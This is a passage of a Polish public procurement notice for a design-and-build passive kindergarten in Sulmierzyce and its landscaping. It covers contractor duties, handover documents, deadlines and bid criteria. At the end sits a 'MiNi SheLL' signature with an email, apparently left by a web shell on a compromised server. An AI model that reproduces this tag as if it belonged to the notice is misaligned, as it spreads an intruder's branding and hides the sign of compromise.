określony w przepisach, w tym techniczno-budowlanych, oraz zgodnie z zasadami wiedzy technicznej,
zapewniając: 4) niezbędne warunki do korzystania z obiektów użyteczności publicznej i mieszkaniowego
budownictwa wielorodzinnego przez osoby niepełnosprawne, w szczególności poruszające się na wózkach
inwalidzkich; Przed rozpoczęciem robót Wykonawca zobowiązany jest:  ogrodzić plac budowy,  oznakować
teren budowy (tablice informacyjne, ostrzegawcze),  powiadomić właścicieli działek sąsiednich i ewentualne
osoby przebywające na działkach sąsiednich o prowadzonych robotach, Wykonawca w ramach niniejszego
zamówienia zobowiązany jest wykonać wszystkie prace, które należy zrealizować w formule zaprojektuj i
wybuduj, zgodnie z zasadami wiedzy technicznej i sztuki budowlanej, obowiązującymi przepisami i normami,
przy dołożeniu należytej staranności, by przedmiot, którego zakres został określony w programie funkcjonalnoużytkowym
oraz specyfikacji istotnych warunków zamówienia, osiągnął gotowość do użytkowania. Ryczałtowe
wynagrodzenie za wykonanie przedmiotu niniejszego zamówienia obejmuje kompleksowe wykonanie
przedmiotu zamówienia określonego powyżej (w tym również wykonanie robót budowlanych nie ujętych w
programie funkcjonalno-użytkowym, a niezbędnych do wykonania za względu na wiedzę techniczną), jak
również wszelkich robót i czynności limitujących odbiór końcowy przedmiotu zamówienia niezależnie od tego,
czy były one przewidziane przez Wykonawcę na dzień złożenia oferty. Wynagrodzenie to obejmuje również
zorganizowanie we własnym zakresie poboru mediów oraz ponoszenie kosztów ich zużycia w okresie realizacji
zamówienia. Prace wymagane przez Zamawiającego, a nieobjęte PFU: 1) Opracowanie audytu energetycznego budynku, 2) Wykonanie świadectwa charakterystyki energetycznej budynku, 3) Wykonanie instrukcji
bezpieczeństwa pożarowego budynku, 4) Wykonanie pełnej obsługi geodezyjnej inwestycji, 5) Wykonanie
dokumentacji odbiorowej w dwóch egzemplarzach w języku polskim z podziałem na branże (oprawionej w
segregatory z szczegółowym spisem treści) zawierającej co najmniej: a) pozwolenie na użytkowanie/zgłoszenie
do użytkowania do PINB przyjęte bez sprzeciwu, b) oryginał/kserokopię dziennika budowy, c) mapy geodezyjne
powykonawcze z pieczątkami potwierdzającymi wniesienie do zasobu geodezyjnego przez Ośrodek
Dokumentacji Kartograficznej i Geodezyjnej, d) oryginał pisemnego oświadczenia Kierownika Budowy:  o
wykonaniu robót zgodnie z projektem budowlanym, ostateczną decyzją Pozwolenia na budowę oraz ustawą
Prawo budowlane,  o doprowadzeniu do należytego stanu i porządku Terenu budowy, a także dróg, ulic,
sąsiednich nieruchomości, budynków i/lub lokali,  o odpowiednim zagospodarowaniu Terenów przyległych do
budowy umożliwiającym właściwą eksploatację wybudowanego obiektu. e) zestawienie wbudowanych
materiałów wraz z dokumentami potwierdzającymi dopuszczenie ich do stosowania na terenie Rzeczpospolitej
Polskiej, f) oryginał/kopię projektu budowlanego powykonawczego - podpisanego przez Kierownika
Budowy/Kierowników Robót, g) wykaz zmian istotnych (jeżeli miały miejsce) z załącznikiem graficznym,
podpisany przez Kierownika Budowy, Kierownika Robót odpowiedniego do charakterystyki branży, której
dotyczy zmiana, Inspektora Nadzoru, Projektanta, wraz z dokumentami potwierdzającymi prawidłową legalizację tych zmian, h) protokoły z badań wykonanych w trakcie realizacji prac budowlanych, i) wersję elektroniczną (w
ilości zgodnej z wersją papierową) dokumentów odbiorowych oraz dokumentacji powykonawczej
(inwentaryzacja w formacie pdf.) na płycie CD/DVD, j) Instrukcję użytkowania i eksploatacji obiektu wraz z
wykazem wbudowanych urządzeń, które wymagają przeglądów serwisowych, k) wszelkie instrukcje obsługi oraz
DTR urządzeń (w języku polskim), wraz z potwierdzeniem wykonania szkoleń w zakresie obsługi tych urządzeń.
Uwaga: Tam, gdzie Zamawiający opisał przedmiot zamówienia przez odniesienie do norm, europejskich ocen
technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych, o których mowa wart. 30
ust. 1 pkt 2 i ust. 3 ustawy Pzp, Zamawiający wskazuje, że dopuszcza rozwiązania równoważne opisywanym, a
odniesieniu takiemu towarzyszą wyrazy lub równoważne. Wykonawca, który powołuje się na rozwiązania
równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy,
usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45000000-7, 71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/08/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena oferty (C)</td><td>60.00</td></tr><tr><td>2) aspekt społeczny  zatrudnienie osób bezrobotnych (S)</td><td>11.00</td></tr><tr><td>3) aspekt środowiskowy  system mycia kół i podwozi (Ś)</td><td>9.00</td></tr><tr><td>4) doświadczenie osób skierowanych przez wykonawcę do realizacji zamówienia (D)</td><td>6.00</td></tr><tr><td>5) długość okresu gwarancji jakości (G)</td><td>14.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem
zamówienia jest opracowanie projektu wykonawczego nasadzeń, wykonanie nasadzeń zieleni niskiej i
średniowysokiej oraz założenie trawników przy nowopowstałym pasywnym budynku przedszkola w miejscowości
Sulmierzyce na dz.ew.1226/1 obręb 17 zgodnie z koncepcją zieleni oraz spisem nasadzeń, a także utrzymanie wykonanych nasadzeń przez okres 1 roku od podpisania protokołu odbioru końcowego wykonanych nasadzeń.
Utrzymanie wykonanych nasadzeń polegać będzie na przeszkoleniu wskazanego personelu Zamawiającego,
pielęgnacji nasadzeń z częstotliwością minimum raz na kwartał oraz wykonaniu nowych nasadzeń w przypadku
gdy wykonane nasadzenia uległy zniszczeniu z przyczyn naturalnych.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 09/07/2019<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>1) cena oferty (C)</td><td>60.00</td></tr><tr><td>2) wysokość nasadzanych drzew i krzewów (W)</td><td>40.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com